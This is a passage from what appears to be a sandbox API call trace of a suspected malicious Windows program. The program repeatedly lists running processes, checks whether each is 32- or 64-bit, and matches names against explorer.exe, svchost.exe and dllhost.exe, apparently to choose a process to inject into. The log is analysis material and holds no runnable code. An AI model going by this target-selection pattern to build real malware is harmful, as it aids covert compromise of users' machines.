lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xd8 [0205.355] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.355] CloseHandle (hObject=0xd8) returned 1 [0205.355] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0205.355] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0205.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xd8 [0205.355] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.356] CloseHandle (hObject=0xd8) returned 1 [0205.356] lstrcmpiA (lpString1="taskeng.exe", lpString2="explorer.exe") returned 1 [0205.356] lstrcmpiA (lpString1="taskeng.exe", lpString2="svchost.exe") returned 1 [0205.356] lstrcmpiA (lpString1="taskeng.exe", lpString2="dllhost.exe") returned 1 [0205.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0205.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0205.356] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xd8 [0205.357] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.357] CloseHandle (hObject=0xd8) returned 1 [0205.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xd8 [0205.357] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.357] CloseHandle (hObject=0xd8) returned 1 [0205.357] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0205.357] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x958) returned 0xd8 [0205.358] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.358] CloseHandle (hObject=0xd8) returned 1 [0205.358] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0205.358] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0205.359] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xd8 [0205.359] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0205.359] CloseHandle (hObject=0xd8) returned 1 [0205.359] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0205.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0205.360] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0205.360] CloseHandle (hObject=0xd4) returned 1 [0205.360] Sleep (dwMilliseconds=0x3e8) [0206.393] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0206.395] Process32First (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0206.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0206.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0206.396] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0206.396] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0206.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0206.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.397] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0206.397] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0206.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0206.398] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0206.398] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0206.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0206.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0206.399] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0206.399] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0206.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0206.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0206.400] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0206.400] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0206.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0206.401] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0206.402] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0206.402] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0206.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0206.403] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0206.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0206.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0206.404] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0206.405] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0206.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xd8 [0206.405] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.405] CloseHandle (hObject=0xd8) returned 1 [0206.405] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0206.405] lstrcmpiA (lpString1="dwm.exe", lpString2="svchost.exe") returned -1 [0206.405] lstrcmpiA (lpString1="dwm.exe", lpString2="dllhost.exe") returned 1 [0206.405] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0206.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0206.406] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0206.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xd8 [0206.406] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.406] CloseHandle (hObject=0xd8) returned 1 [0206.406] lstrcmpiA (lpString1="taskhost.exe", lpString2="explorer.exe") returned 1 [0206.406] lstrcmpiA (lpString1="taskhost.exe", lpString2="svchost.exe") returned 1 [0206.406] lstrcmpiA (lpString1="taskhost.exe", lpString2="dllhost.exe") returned 1 [0206.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0206.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0206.407] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0206.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0206.408] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0206.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xd8 [0206.408] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.408] CloseHandle (hObject=0xd8) returned 1 [0206.408] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0206.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xd8 [0206.409] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.409] CloseHandle (hObject=0xd8) returned 1 [0206.409] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0206.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xd8 [0206.409] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.409] CloseHandle (hObject=0xd8) returned 1 [0206.409] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0206.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xd8 [0206.410] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.410] CloseHandle (hObject=0xd8) returned 1 [0206.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0206.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xd8 [0206.410] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.410] CloseHandle (hObject=0xd8) returned 1 [0206.410] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0206.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xd8 [0206.411] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.411] CloseHandle (hObject=0xd8) returned 1 [0206.411] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0206.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xd8 [0206.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.412] CloseHandle (hObject=0xd8) returned 1 [0206.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0206.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xd8 [0206.412] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.412] CloseHandle (hObject=0xd8) returned 1 [0206.412] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0206.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xd8 [0206.413] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.413] CloseHandle (hObject=0xd8) returned 1 [0206.413] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0206.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xd8 [0206.413] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.413] CloseHandle (hObject=0xd8) returned 1 [0206.413] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0206.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xd8 [0206.414] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.414] CloseHandle (hObject=0xd8) returned 1 [0206.414] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0206.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xd8 [0206.415] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.415] CloseHandle (hObject=0xd8) returned 1 [0206.415] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0206.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xd8 [0206.415] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.415] CloseHandle (hObject=0xd8) returned 1 [0206.415] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0206.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xd8 [0206.416] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.416] CloseHandle (hObject=0xd8) returned 1 [0206.416] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0206.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xd8 [0206.416] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.417] CloseHandle (hObject=0xd8) returned 1 [0206.417] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0206.417] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xd8 [0206.417] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.417] CloseHandle (hObject=0xd8) returned 1 [0206.417] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0206.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xd8 [0206.418] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.418] CloseHandle (hObject=0xd8) returned 1 [0206.418] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0206.418] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xd8 [0206.418] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.418] CloseHandle (hObject=0xd8) returned 1 [0206.418] Process32Next (in: hSnapshot=0xd4, lppe=0x10fb80 | out: lppe=0x10fb80*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0206.419] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xd8 [0206.419] IsWow64Process (in: hProcess=0xd8, Wow64Process=0x10fb58 | out: Wow64Process=0x10fb58) returned 1 [0206.419] CloseHandle 